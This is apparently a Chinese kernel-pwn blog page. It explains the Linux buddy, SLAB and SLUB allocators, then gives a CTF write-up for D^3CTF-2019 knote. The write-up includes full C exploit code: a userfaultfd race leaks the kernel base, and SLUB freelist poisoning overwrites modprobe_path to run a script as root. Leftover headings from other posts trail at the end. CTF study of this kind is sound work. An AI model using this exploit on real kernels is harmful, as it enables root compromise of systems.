	MIGRATE_HIGHATOMIC = MIGRATE_PCPTYPES,
#ifdef CONFIG_CMA
	/*
	 * MIGRATE_CMA migration type is designed to mimic the way
	 * ZONE_MOVABLE works.  Only movable pages can be allocated
	 * from MIGRATE_CMA pageblocks and page allocator never
	 * implicitly change migration type of MIGRATE_CMA pageblock.
	 *
	 * The way to use it is to change migratetype of a range of
	 * pageblocks to MIGRATE_CMA which can be done by
	 * __free_pageblock_cma() function.
	 */
	MIGRATE_CMA,
#endif
#ifdef CONFIG_MEMORY_ISOLATION
	MIGRATE_ISOLATE,	/* can't allocate from here */
#endif
	MIGRATE_TYPES
};

这里定义了链表中内存块的属性：

linux为了防止内存中产生过多的碎片，一般把页的类型分为三种：
不可移动页：在内存中有固定位置，不能移动到其他地方。内核中使用的页大部分是属于这种类型。
可回收页：不能直接移动，但可以删除，页中的内容可以从某些源中重新生成。例如，页内容是映射到文件数据的页就属于这种类型。对于这种类型，在内存短缺(分配失败)时，会发起内存回收，将这类型页进行回写释放。
可移动页：可随意移动，用户空间的进程使用的没有映射具体磁盘文件的页就属于这种类型(比如堆、栈、shmem共享内存、匿名mmap共享内存)，它们是通过进程页表映射的，把这些页复制到新位置时，只要更新进程页表就可以了。一般这些页是从高端内存管理区获取。

上面的每一个链表中保存的所有内存块的属性都是一样的。因此总的来看，伙伴系统可以表示为下图所示的结构：

其中枚举类型具体的含义我们只需要了解即可，在Kernel pwn中我们应该应对的最多的还是SLAB和SLUB系统。虽然SLAB系统正逐渐被SLUB替换，但还是有必要进行了解。

2. SLAB系统介绍

SLAB分配器建立在伙伴系统基础上，由于参考资料年代较为久远，部分源码与最近的Linux内核源码差距较大，因此不做解释，但影响不大。

在SLAB中，我们将可分配的内存块称之为对象，一个分配器由结构体kmem_cache描述，结构如下（选自Linux 5.18.19版本内核）

struct kmem_cache {
	struct array_cache __percpu *cpu_cache;

/* 1) Cache tunables. Protected by slab_mutex */
	unsigned int batchcount;
	unsigned int limit;
	unsigned int shared;

	unsigned int size;
	struct reciprocal_value reciprocal_buffer_size;
/* 2) touched by every alloc & free from the backend */

	slab_flags_t flags;		/* constant flags */
	unsigned int num;		/* # of objs per slab */

/* 3) cache_grow/shrink */
	/* order of pgs per slab (2^n) */
	unsigned int gfporder;

	/* force GFP flags, e.g. GFP_DMA */
	gfp_t allocflags;

	size_t colour;			/* cache colouring range */
	unsigned int colour_off;	/* colour offset */
	struct kmem_cache *freelist_cache;
	unsigned int freelist_size;

	/* constructor func */
	void (*ctor)(void *obj);

/* 4) cache creation/removal */
	const char *name;
	struct list_head list;
	int refcount;
	int object_size;
	int align;

/* 5) statistics */
#ifdef CONFIG_DEBUG_SLAB
	unsigned long num_active;
	unsigned long num_allocations;
	unsigned long high_mark;
	unsigned long grown;
	unsigned long reaped;
	unsigned long errors;
	unsigned long max_freeable;
	unsigned long node_allocs;
	unsigned long node_frees;
	unsigned long node_overflow;
	atomic_t allochit;
	atomic_t allocmiss;
	atomic_t freehit;
	atomic_t freemiss;

	/*
	 * If debugging is enabled, then the allocator can add additional
	 * fields and/or padding to every object. 'size' contains the total
	 * object size including these internal fields, while 'obj_offset'
	 * and 'object_size' contain the offset to the user object and its
	 * size.
	 */
	int obj_offset;
#endif /* CONFIG_DEBUG_SLAB */

#ifdef CONFIG_KASAN
	struct kasan_cache kasan_info;
#endif

#ifdef CONFIG_SLAB_FREELIST_RANDOM
	unsigned int *random_seq;
#endif

	unsigned int useroffset;	/* Usercopy region offset */
	unsigned int usersize;		/* Usercopy region size */

	struct kmem_cache_node *node[MAX_NUMNODES];
};

其中kmem_cache_node *node[MAX_NUMNODES]中就保存有SLAB分配器中的一些核心结构，这里的MAX_NUMNODES在x86-64架构下的值为64：

struct kmem_cache_node {
	spinlock_t list_lock;

#ifdef CONFIG_SLAB
	struct list_head slabs_partial;	/* partial list first, better asm code */
	struct list_head slabs_full;
	struct list_head slabs_free;
	unsigned long total_slabs;	/* length of all slab lists */
	unsigned long free_slabs;	/* length of free slab list only */
	unsigned long free_objects;
	unsigned int free_limit;
	unsigned int colour_next;	/* Per-node cache coloring */
	struct array_cache *shared;	/* shared per node */
	struct alien_cache **alien;	/* on other nodes */
	unsigned long next_reap;	/* updated without locking */
	int free_touched;		/* updated without locking */
#endif

#ifdef CONFIG_SLUB
	unsigned long nr_partial;
	struct list_head partial;
#ifdef CONFIG_SLUB_DEBUG
	atomic_long_t nr_slabs;
	atomic_long_t total_objects;
	struct list_head full;
#endif
#endif

};

这里的list_head里面只保存了两个值：next指针和prev指针，也就是双向链表的经典结构。这里可以看到有三个双向链表：slabs_partial、slabs_full、slabs_free，分别保存的是内部有部分对象被分配的SLAB、内部所有对象都被分配的SLAB、内部所有对象都空闲的SLAB。这三个链表中的slab可以互相转化，如向一个所有对象都空闲的SLAB中申请空间成功后，这个SLAB就会从slabs_free移动到slabs_partial。

虽然文章开头参考的文章已经在一定程度上过时，但其中关于SLAB分配器的实现原理和思想却一直沿用至今。在5.18.19版本的page结构体中，已经找不到参考文章中的一些关键结构，不过这不影响我们对SLAB本身的分析。

下面是5.18.19版本内核的slab结构体声明：

struct slab {
	unsigned long __page_flags;

#if defined(CONFIG_SLAB)

	union {
		struct list_head slab_list;
		struct rcu_head rcu_head;
	};
	struct kmem_cache *slab_cache;
	void *freelist;	/* array of free object indexes */
	void *s_mem;	/* first object */
	unsigned int active;

#elif defined(CONFIG_SLUB)

	union {
		struct list_head slab_list;
		struct rcu_head rcu_head;
#ifdef CONFIG_SLUB_CPU_PARTIAL
		struct {
			struct slab *next;
			int slabs;	/* Nr of slabs left */
		};
#endif
	};
	struct kmem_cache *slab_cache;
	/* Double-word boundary */
	void *freelist;		/* first free object */
	union {
		unsigned long counters;
		struct {
			unsigned inuse:16;
			unsigned objects:15;
			unsigned frozen:1;
		};
	};
	unsigned int __unused;

#elif defined(CONFIG_SLOB)

	struct list_head slab_list;
	void *__unused_1;
	void *freelist;		/* first free block */
	long units;
	unsigned int __unused_2;

#else
#error "Unexpected slab allocator configured"
#endif

	atomic_t __page_refcount;
#ifdef CONFIG_MEMCG
	unsigned long memcg_data;
#endif
};

可以看到，历史版本中的诸如s_mem等关键控制结构体从page移到了slab中。由此，page结构体中也就不需要定义这些属性了。s_mem指向的是该SLAB分配器中的第一个对象，而freelist指向的是一个重要的标识对象使用情况的结构，我们接下来就会提到。这两个指针指向同一页中的不同地址，其中如果一个page被用作SLAB分配器，那么它的virtual（page中的最后一个属性）属性值与SLAB中的freelist指向相同地址。

关于SLAB内的分配机制，以下面一张图进行展示，其中需要注意的是：分配到哪一个对象不是外界能够决定的，而释放哪一个对象是外界能够决定的。如下图所示的分配方式能够最大限度保证分配到的对象是最近释放的。在进行分配时，active读取其索引指向的值，并向前移动一位，在进行释放时，active首先回退一位，在将这一位对应的索引值修改为被释放的对象的索引值。

在这种分配机制下，很容易判断一个SLAB中的对象究竟是全部分配，还是全部释放，还是部分分配。因为分配对应一次索引值前移，而释放对应一次索引值后移，只要索引值为0，这个SLAB就一定为空；只要索引值等于SLAB中对象的个数-1，这个SLAB就一定为满。

看到这里，我们对于SLAB的分配机制应该有了一个基本的认识，但是SLAB中还有一个染色的问题。有了上面的组织形式，SLAB已经能够作为一个成熟的内存分配器了，至于为什么要添加染色的机制，主要是为了性能的考虑：

我们知道内存需要处理时要先放入CPU硬件高速缓存中，而CPU硬件高速缓存与内存的映射方式有多种。在同一个kmem_cache中所有SLAB都是相同大小，都是相同连续长度的页框组成，这样的话在不同SLAB中相同对象号对于页框的首地址的偏移量也相同，这样有很可能导致不同SLAB中相同对象号的对象放入CPU硬件高速缓存时会处于同一行，当我们交替操作这两个对象时，CPU的cache就会交替换入换出，效率就非常差。SLAB着色就是在同一个kmem_cache中对不同的SLAB添加一个偏移量，就让相同对象号的对象不会对齐，也就不会放入硬件高速缓存的同一行中，提高了效率。

着色空间就是前端的空闲区域，这个区有大小都是在分配新的SLAB时计算好的，计算方法很简单，node结点对应的kmem_cache_node中的colour_next乘上kmem_cache中的colour_off就得到了偏移量，然后colour_next++，当colour_next等于kmem_cache中的colour时，colour_next回归到0。
1
2
3
4
5
偏移量 = kmem_cache.colour_off * kmem_cache.node[NODE_ID].colour_next;

kmem_cache.node[NODE_ID].colour_next++;
if (kmem_cache.node[NODE_ID].colour_next == kmem_cache.colour)
    kmem_cache.node[NODE_ID].colour_next = 0;

3. SLUB系统介绍

说完了SLAB，终于可以开始我们的重点——SLUB系统了。都说SLUB系统是SLAB的升级版，那么SLUB到底比SLAB升级在什么地方呢？

简单地来说，首先SLUB直接删掉了两个SLAB链表，即在SLAB节点中表示全空和全满的对象链表，只保留了一个部分满的SLAB链表。其次，在slab结构体内部也有很大的变化，删去了SLAB中指引内存分配的关键的数组结构和描述符数组，而只是使用一个指针形成链表，将所有空闲的对象串连在一起：

（原文是有贴图的，但是在笔者的windows系统下加载不出来，在ubuntu倒是可以加载出来。上图选自资料）

注意slab和slub分别使用了不同的kmem_cache结构体，分别定义在/include/linux/slab_def.h和/include/linux/slub_def.h中。上面解释SLAB的时候使用的是/include/linux/slab_def.h的结构体。

struct kmem_cache {
	struct kmem_cache_cpu __percpu *cpu_slab;
	/* Used for retrieving partial slabs, etc. */
	slab_flags_t flags;
	unsigned long min_partial;
	unsigned int size;	/* The size of an object including metadata */
	unsigned int object_size;/* The size of an object without metadata */
	struct reciprocal_value reciprocal_size;
	unsigned int offset;	/* Free pointer offset */
#ifdef CONFIG_SLUB_CPU_PARTIAL
	/* Number of per cpu partial objects to keep around */
	unsigned int cpu_partial;
	/* Number of per cpu partial slabs to keep around */
	unsigned int cpu_partial_slabs;
#endif
	struct kmem_cache_order_objects oo;

	/* Allocation and freeing of slabs */
	struct kmem_cache_order_objects max;
	struct kmem_cache_order_objects min;
	gfp_t allocflags;	/* gfp flags to use on each alloc */
	int refcount;		/* Refcount for slab cache destroy */
	void (*ctor)(void *);
	unsigned int inuse;		/* Offset to metadata */
	unsigned int align;		/* Alignment */
	unsigned int red_left_pad;	/* Left redzone padding size */
	const char *name;	/* Name (only for display!) */
	struct list_head list;	/* List of slab caches */
#ifdef CONFIG_SYSFS
	struct kobject kobj;	/* For sysfs */
#endif
#ifdef CONFIG_SLAB_FREELIST_HARDENED
	unsigned long random;
#endif

#ifdef CONFIG_NUMA
	/*
	 * Defragmentation by allocating from a remote node.
	 */
	unsigned int remote_node_defrag_ratio;
#endif

#ifdef CONFIG_SLAB_FREELIST_RANDOM
	unsigned int *random_seq;
#endif

#ifdef CONFIG_KASAN
	struct kasan_cache kasan_info;
#endif

	unsigned int useroffset;	/* Usercopy region offset */
	unsigned int usersize;		/* Usercopy region size */

	struct kmem_cache_node *node[MAX_NUMNODES];
};

在SLUB的kmem_cache中，有一个kmem_cache_cpu结构体指针，这是SLUB分配器的描述符：

struct kmem_cache_cpu {
	void **freelist;	/* Pointer to next available object */
	unsigned long tid;	/* Globally unique transaction id */
	struct slab *slab;	/* The slab from which we are allocating */
#ifdef CONFIG_SLUB_CPU_PARTIAL
	struct slab *partial;	/* Partially allocated frozen slabs */
#endif
	local_lock_t lock;	/* Protects the fields above */
#ifdef CONFIG_SLUB_STATS
	unsigned stat[NR_SLUB_STAT_ITEMS];
#endif
};

结构如下图所示（图片选自资料）

其中需要重点关注的就是freelist，里面保存的就是对象本身，以链表连接。在上一篇文章中，我们使用了SLUB的结构特性实现了利用，在那道题中，读者可以进行调试发现，对象内部的内容非常简单，空闲的对象开头8字节保存的就是下一个空闲对象的地址，以链表形式连接，在释放一个对象时，会将该对象放在freelist链表头部。这也就是为什么在上一题中通过修改指针的值就可以让SLUB为我们分配到任意地址了。在实际的pwn利用中，有一个思路就是恶意篡改SLUB中的freelist，破坏链表以实现任意地址分配，后续可能可以进行任意地址读写。

Kernel pwn 入门 (7)

发表于 2023-02-28 更新于 2023-03-01 分类于学习笔记， kernel pwn 系列
本文字数： 13k 阅读时长 ≈ 12 分钟

本篇文章中，我们会练习回顾上一篇文章中学到的userfaultfd利用方式，同时学习一种新的利用方式：modprobe_path。使用的例题是：D^3CTF-2019 knote，需要两种利用配合使用。下面我们对本题进行分析。题目下载地址：下载。再次感谢Arttnba3师傅的博客。

0x1: .ko文件分析

当然，在利用之前，我们首先还是需要将这个ko文件过一遍。

file_operations

可以看到fops中定义有ioctl函数和open函数的入口，另外由于release函数的起始地址为0，因此这里的所有0都可以看做release函数入口。

ioctl

分析ioctl函数可知，一共定义了以下几种入口：

cmd=0x2333: 执行get函数
cmd=0x1337: 执行add函数
cmd=0x6666: 执行dele函数
cmd=0x8888: 执行edit函数

get

出现了一个mychunk的东西，因此本题和堆有关系。前面if的意思应该是所有chunk的数量不能超过9。在函数中还出现了一个copy_user_generic_unrolled函数，查看源码可知其第一个参数是dest，第二个参数是src，第三个参数是count，和copy_to_user、copy_from_user功能相似。这里看到ptr实际上是get函数的第二个参数，因此也就是将第二个参数（用户地址）中的内容拷贝到mychunk.ptr中。

这就是chunk的结构，其中_anon_0的名字很长的类型是一个联合体，有size和idx两个类型可以表示，为方便将类型名改为info。

因此，get函数就是从用户内存中拷贝内容到分配好的chunk中。

add

在add函数中，可以看到在一开始加了一个读锁。在之后又加了一个写锁。

函数中还调用了_InterlockedExchangeAdd函数，笔者查到的文章中关于这个函数都是Windows下的API，大概的含义是线程互锁下的相加操作。这里将读写锁的值减去200，原因暂时未知。

之后则是通过kmalloc进行内核堆空间分配，后面的my_rwlock.raw_lock._anon_0._anon_0.wlocked = 0;应该表示的是解除写锁。

dele

堆空间释放函数同样使用了读写锁，在释放之后将size和ptr均清空。

edit

这里同样使用了copy_user_generic_unrolled这个函数，但根据参数来判断，这里应该是和copy_to_user函数的含义相同。

knote_open

在这个函数中，通过raw_write_lock函数设定my_rwlock为写锁，不允许其他线程读写in_use。

0x2. init和start.sh文件分析

#!/bin/sh
echo "{==DBG==} INIT SCRIPT"

mount -t proc none /proc
mount -t sysfs none /sys
mkdir /dev/pts
mount -t devpts devpts /dev/pts

mdev -s
exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
echo -e "{==DBG==} Boot took $(cut -d' ' -f1 /proc/uptime) seconds"
insmod note.ko
mknod /dev/knote c 10 233
chmod 666 /dev/knote
chmod 666 /dev/ptmx
chown 0:0 /flag
chmod 400 /flag

poweroff -d 120 -f &

chroot . setuidgid 1000 /bin/sh #normal user


umount /proc
umount /sys
poweroff -d 0  -f

在init文件中，有一些常规的保护措施，如这里的kptr_restrict和dmesg_restrict，都设为1表示对普通用户有限制作用而对root用户没有，因此调试时修改为root用户可以查看kallsyms文件。与之前的题一样，在调试时通过将uid改为0方便调试。

#!/bin/sh
cd /home/ctf
qemu-system-x86_64 \
-m 128M \
-kernel ./bzImage \
-initrd  ./rootfs.cpio \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 kaslr" \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic \
-monitor /dev/null \
-smp cores=2,threads=1 \
-cpu qemu64,+smep,+smap

在start.sh文件中，可以看到开启了kaslr、smp保护。添加上-s选项以供调试。

0x3. 交互编写

通过ioctl函数可知，mychunk实际上就是我们传入ioctl函数的第三个参数，这个chunk结构体会被根据不同的函数进行不同的操作。因此我们可以先将程序的交互写好，再去分析具体的漏洞。

#define GET 0x2333
#define ADD 0x1337
#define EDIT 0x8888
#define DEL 0x6666

int fd;

void get(int index, char* buffer){
    input in = {
            .info = {
                    .index = index,
            },
            .buf = buffer,
    };
    ioctl(fd, GET, &in);
}

void add(int size){
    input in = {
            .info = {
                    .size = size,
            },
    };
    ioctl(fd, ADD, &in);
}

void dele(int index){
    input in = {
            .info = {
                    .index = index,
            }
    };
    ioctl(fd, DEL, &in);
}

void edit(int index, char* buffer){
    input in = {
            .info = {
                    .index = index,
            },
            .buf = buffer,
    };
    ioctl(fd, EDIT, &in);
}

0x4. 漏洞分析与利用

1. 通过`userfaultfd`获取内核基地址

在本题中，核心的操作就是get、add、edit、dele这4个。其中get和edit函数没有加锁，dele和add都加了写锁。通过get或edit函数可以传入一个mmap出来的用户空间，然后触发userfaultfd。那么在条件竞争的这个时间窗口，我们又需要做什么呢？和上一题相似，也是重复打开/dev/ptmx文件，尝试使用同样的方法进行利用。下面是我们的第一个测试程序（kernel.h请参考资料中提到的通用kernel pwn板子，print_binary请参考笔者之前的kernel pwn文章）：

//
// Created by ubuntu on 22-10-5.
//
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include "kernel.h"

typedef struct input{
    union{
        size_t size;
        size_t index;
    }info;
    char* buf;
}input;

#define GET 0x2333
#define ADD 0x1337
#define EDIT 0x8888
#define DEL 0x6666
#define TTY_STRUCT_SIZE 0x2E0

int fd;
static char* faultBuffer;

void get(int index, char* buffer){
    input in = {
            .info.index = index,
            .buf = buffer,
    };
    ioctl(fd, GET, &in);
}

void add(int size){
    input in = {
            .info.size = size,
    };
    ioctl(fd, ADD, &in);
}

void dele(int index){
    input in = {
            .info.index = index,
    };
    ioctl(fd, DEL, &in);
}

void edit(int index, char* buffer){
    input in = {
            .info.index = index,
            .buf = buffer,
    };
    ioctl(fd, EDIT, &in);
}

static char *page = NULL;
static long page_size;

static void *
fault_handler_thread(void *arg)
{
    struct uffd_msg msg;
    int fault_cnt = 0;
    long uffd;

    struct uffdio_copy uffdio_copy;
    ssize_t nread;

    uffd = (long) arg;

    for (;;)
    {
        struct pollfd pollfd;
        int nready;
        pollfd.fd = uffd;
        pollfd.events = POLLIN;
        nready = poll(&pollfd, 1, -1);

        if (nready == -1)
            errExit("poll");

        nread = read(uffd, &msg, sizeof(msg));

        puts(GREEN "Parent process stopped here." CEND);
        sleep(5);

        if (nread == 0)
            errExit("EOF on userfaultfd!\n");

        if (nread == -1)
            errExit("read");

        if (msg.event != UFFD_EVENT_PAGEFAULT)
            errExit("Unexpected event on userfaultfd\n");

        uffdio_copy.src = (unsigned long) page;
        uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address &
                          ~(page_size - 1);
        uffdio_copy.len = page_size;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
            errExit("ioctl-UFFDIO_COPY");

        return NULL;
    }
}

int main(){

    saveStatus();
    page_size = sysconf(_SC_PAGE_SIZE);
    page = malloc(0x1000);
    memset(page, '0', 0x1000);
    faultBuffer = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    registerUserFaultFd(faultBuffer, 0x1000, (void*)fault_handler_thread);

    int shellFile = open("/getFlag", O_RDWR | O_CREAT);
    char* shellCode = "#!/bin/sh\n"
                      "chmod 777 /flag";
    write(shellFile, shellCode, strlen(shellCode));
    close(shellFile);
    system("chmod +x /getFlag");

    fd = open("/dev/knote", O_RDWR);
    add(TTY_STRUCT_SIZE);
    int pid = fork();
    if(pid < 0)
        errExit("Fork failed");
    else if(pid == 0){
        puts(GREEN "Child process sleeping..." CEND);
        sleep(2);
        puts(GREEN "Ready to delete note in child process..." CEND);
        dele(0);
        sleep(1);
        puts(GREEN "Ready to open /dev/ptmx in child process..." CEND);
        open("/dev/ptmx", O_RDWR);
        exit(0);
    }else
        get(0, faultBuffer);
    print_binary(faultBuffer, TTY_STRUCT_SIZE);
}

上图就是通过userfaultfd阻塞后获取到的部分内存内容，可以发现虽然/dev/ptmx打开之后分配了ptm_unix98_ops和pty_unix98_ops，但是并没有出现tty_operations中特有的魔数。

但是在0x2B0的偏移处我们发现了一个可疑的值：0xffffffff91bd4ef0。为什么说这个值很可疑呢？如果我们使用cat /proc/kallsyms命令获取标识符的地址时不难发现，绝大多数内核的标识符地址都是以8个f开头的，而在我们获取到的地址中只有这一个值前面跟上了8个f，因此我们有理由怀疑这个地址有可能是某个标识符的地址，而不需要对我们获取的其他值通过
cat /proc/kallsyms | grep xxx来进行查找了。从上面的图中我们也可以看到，这个值也确实是一个标识符的值：do_SAK_work，我们不需要管这个标识符的作用是什么，但通过这个标识符我们就已经能够获取到内核的基址，绕过KASLR保护了。

在IDA中，我们可以获取到do_SAK_work在未KASLR时的地址。

需要注意的是，本题中do_SAK_work这个地址并不是每一次都会出现，而且有可能尝试很多次都是什么都没有读取到，需要进行多次尝试才能获取该地址。

2. 通过`modprobe_path`进行利用

在获取了内核的基地址之后，我们就需要使用一个新的利用方式——modprobe_path来进行后面的利用了。

（节选自arttnba3师傅的博客）

当我们尝试去执行（execve）一个非法的文件（file magic not found），内核会经历如下调用链

entry_SYSCALL_64()
   sys_execve()
     do_execve()
       do_execveat_common()
         bprm_execve()
           exec_binprm()
             search_binary_handler()
               __request_module() // wrapped as request_module
                 call_modprobe()

由于本题的kernel版本为5.3.6，因此我们找到这个版本的call_modprobe函数看一下：

// kernel/kmod.c line 70
static int call_modprobe(char *module_name, int wait)
{
	struct subprocess_info *info;
	static char *envp[] = {
		"HOME=/",
		"TERM=linux",
		"PATH=/sbin:/usr/sbin:/bin:/usr/bin",
		NULL
	};

	char **argv = kmalloc(sizeof(char *[5]), GFP_KERNEL);
	if (!argv)
		goto out;

	module_name = kstrdup(module_name, GFP_KERNEL);
	if (!module_name)
		goto free_argv;

	argv[0] = modprobe_path;
	argv[1] = "-q";
	argv[2] = "--";
	argv[3] = module_name;	/* check free_modprobe_argv() */
	argv[4] = NULL;

	info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL,
					 NULL, free_modprobe_argv, NULL);
	if (!info)
		goto free_module_name;

	return call_usermodehelper_exec(info, wait | UMH_KILLABLE);

free_module_name:
	kfree(module_name);
free_argv:
	kfree(argv);
out:
	return -ENOMEM;
}

其中modprobe_path被定义在data段中，值为/sbin/modprobe。而call_usermodehelper_exec函数会以root权限执行这个程序。由于data段可写，因此如果能够将modprobe_path的值改写，就可以执行任意shell脚本了。

那么应该如何修改modprobe_path呢？这里就需要用到我们对于slub内核内存分配系统的理解了。在前面笔者并没有对linux内核的内存分配系统作详尽的解释，可以参考下面的资料进行了解，后面笔者也会进行进一步的学习和分析：

页框分配器
 SLAB概述
 SLUB概述

在本题中，我们只需要清楚SLUB分配器的一个特性：SLUB分配器中有多个内存块（笔者称作cache），在一个被释放的cache的最前面保存的是下一个可用的cache地址，也就是说，如果我们能够利用条件竞争漏洞去修改一个已经被释放的cache的最前8个字节，那么下一次分配能够分配到该chunk的话，再下一次就能够分配到任一地址去。也正是利用这个特性，我们可以将modprobe_path的地址写到被释放的cache中，然后再进行两次分配即可分配到modprobe_path处的地址，并通过edit函数随意进行改写。有关于Linux内核内存分配机制，笔者将会在下一篇文章中进行详细介绍，这里我们只需要知道上面这一点就可以了。同时还需要注意的是，在分配到modprobe_path之后，由于我们已经破坏了SLUB的结构，因此如果直接结束进程，会导致kernel panic，本题中我们只需要在modprobe_path利用之前编写一个脚本将flag文件的权限改成777，后利用条件竞争漏洞将modprobe_path修改为这个脚本的路径，然后执行一个非法文件触发modprobe_path漏洞，以root权限执行这个脚本，后面我们就能够直接通过read读取flag文件的内容了。因此本题的利用方式并不是提权。

如此一来，思路就清晰了，exp自然就信手拈来了。

//
// Created by ubuntu on 22-10-5.
//
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include "kernel.h"

typedef struct input{
    union{
        size_t size;
        size_t index;
    }info;
    char* buf;
}input;

#define GET 0x2333
#define ADD 0x1337
#define EDIT 0x8888
#define DEL 0x6666
#define TTY_STRUCT_SIZE 0x2E0

#define DO_SAK_WORK_ADDR 0xFFFFFFFF815D4EF0
#define COMMIT_CREDS 0xFFFFFFFF810B3040
#define PREPARE_KERNEL_CRED 0xFFFFFFFF810B3390
#define MODPROBE_PATH 0xFFFFFFFF8245C5C0

int fd;
static char* faultBuffer;

void get(int index, char* buffer){
    input in = {
            .info.index = index,
            .buf = buffer,
    };
    ioctl(fd, GET, &in);
}

void add(int size){
    input in = {
            .info.size = size,
    };
    ioctl(fd, ADD, &in);
}

void dele(int index){
    input in = {
            .info.index = index,
    };
    ioctl(fd, DEL, &in);
}

void edit(int index, char* buffer){
    input in = {
            .info.index = index,
            .buf = buffer,
    };
    ioctl(fd, EDIT, &in);
}

static char *page = NULL;
static long page_size;

static void *
fault_handler_thread(void *arg)
{
    struct uffd_msg msg;
    int fault_cnt = 0;
    long uffd;

    struct uffdio_copy uffdio_copy;
    ssize_t nread;

    uffd = (long) arg;

    for (;;)
    {
        struct pollfd pollfd;
        int nready;
        pollfd.fd = uffd;
        pollfd.events = POLLIN;
        nready = poll(&pollfd, 1, -1);

        if (nready == -1)
            errExit("poll");

        nread = read(uffd, &msg, sizeof(msg));

        puts(GREEN "Parent process stopped here." CEND);
        sleep(5);

        if (nread == 0)
            errExit("EOF on userfaultfd!\n");

        if (nread == -1)
            errExit("read");

        if (msg.event != UFFD_EVENT_PAGEFAULT)
            errExit("Unexpected event on userfaultfd\n");

        uffdio_copy.src = (unsigned long) page;
        uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address &
                          ~(page_size - 1);
        uffdio_copy.len = page_size;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
            errExit("ioctl-UFFDIO_COPY");

        return NULL;
    }
}

int main(){

    saveStatus();
    page_size = sysconf(_SC_PAGE_SIZE);
    page = malloc(0x1000);
    memset(page, '0', 0x1000);
    faultBuffer = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    registerUserFaultFd(faultBuffer, 0x1000, (void*)fault_handler_thread);

    int shellFile = open("/getFlag", O_RDWR | O_CREAT);
    char* shellCode = "#!/bin/sh\n"
                      "chmod 777 /flag";
    write(shellFile, shellCode, strlen(shellCode));
    close(shellFile);
    system("chmod +x /getFlag");

    fd = open("/dev/knote", O_RDWR);
    add(TTY_STRUCT_SIZE);
    int pid = fork();
    if(pid < 0)
        errExit("Fork failed");
    else if(pid == 0){
        puts(GREEN "Child process sleeping..." CEND);
        sleep(2);
        puts(GREEN "Ready to delete note in child process..." CEND);
        dele(0);
        sleep(1);
        puts(GREEN "Ready to open /dev/ptmx in child process..." CEND);
        open("/dev/ptmx", O_RDWR);
        exit(0);
    }else
        get(0, faultBuffer);

    print_binary(faultBuffer, TTY_STRUCT_SIZE);
    u_int64_t do_sak_work = *((u_int64_t*)(faultBuffer + 0x2B0));
    if(!do_sak_work)
        errExit("Failed to get do_SAK_work!");
    printf(GREEN "Successfully got address of do_SAK_work: %#zx" CEND, do_sak_work);
    u_int64_t offset = do_sak_work - DO_SAK_WORK_ADDR;  // offset got

    commit_creds = offset + COMMIT_CREDS;               // get address of commit_creds
    prepare_kernel_cred = offset + PREPARE_KERNEL_CRED; // get address of prepare_kernel_cred
    u_int64_t modprobe_path = offset + MODPROBE_PATH;   // get address of modprobe_path

    add(0x100);
    memcpy(page, &modprobe_path, 8);
    pid = fork();
    if(pid < 0)
        errExit("Fork failed");
    else if(pid == 0){
        puts(GREEN "Child process sleeping..." CEND);
        sleep(2);
        puts(GREEN "Ready to delete note in child process..." CEND);
        dele(0);
        sleep(1);
        puts(GREEN "Ready to open /dev/ptmx in child process..." CEND);
        open("/dev/ptmx", O_RDWR);
        exit(0);
    }else
        edit(0, page);

    add(0x100);
    add(0x100);     // this cache allocates to modprobe_path
    edit(1, "/getFlag");

    system("echo -e '\xff\xff\xff\xff' > /hook");
    system("chmod +x /hook");
    system("/hook");

    sleep(1);
    int flag = open("/flag", O_RDWR);
    if(flag < 0)
        errExit("Failed to open flag file!");
    char flagContent[0x50] = {0};
    read(flag, flagContent, 0x50);
    write(1, flagContent, 0x50);
    system("/bin/sh");	// to prevent kernel panic

    return 0;
}

图中的this is example就是flag。

1. 逆向分析

2. 解题第一步——泄露信息

3. 解题第二步：伪造FILE、meta、group等结构并利用

1. 主要数据结构

malloc_context

meta_area

meta

group

2. 代码审计

malloc（/src/malloc/mallocng/malloc.c line 299）

try_avail（/src/malloc/mallocng/malloc.c, line 114）

free（/src/malloc/mallocng/free.c, line 101）

nontrivial_free（/src/malloc/mallocng/free.c, line 72）

CISCN2022-satool

Step 1: 通过README了解这个LLVM pass的功能

Step 2: 找到runOnFunction覆写函数

Step 3: 分析runOnFunction函数

Segment 1

Segment 2

Step 4: 分析handle函数

Segment 1

Segment 2

Segment 3

Segment 4

Segment 5

Segment 6

Segment 7

Segment 8

Step 5: 分析callCode函数，思考利用方式

Step 6: 构造shellcode

Step 7: getshell

RedHat2021-simpleVM

Step 1: 找到runOnFunction函数

Step 2: 分析runOnFunction函数

Step 3: 分析sub_6AC0函数

Step 4: 分析sub_6B80函数

Segment 1

Segmant 2

Segment 3

Segment 4

Segment 5

Segment 6

Segment 7

Step 5: 编写exp.c，同时进行调试

CISCN-2021 satool

1. 逆向分析

2. 调试与解题

1. 伙伴系统重温

2. SLAB系统介绍

3. SLUB系统介绍

0x1: .ko文件分析

file_operations

ioctl

get

add

dele

edit

knote_open

0x2. init和start.sh文件分析

0x3. 交互编写

0x4. 漏洞分析与利用

1. 通过userfaultfd获取内核基地址

2. 通过modprobe_path进行利用

3. 解题第二步：伪造`FILE`、`meta`、`group`等结构并利用

malloc（`/src/malloc/mallocng/malloc.c line 299`）

try_avail（`/src/malloc/mallocng/malloc.c, line 114`）

free（`/src/malloc/mallocng/free.c, line 101`）

nontrivial_free（`/src/malloc/mallocng/free.c, line 72`）

1. 通过`userfaultfd`获取内核基地址

2. 通过`modprobe_path`进行利用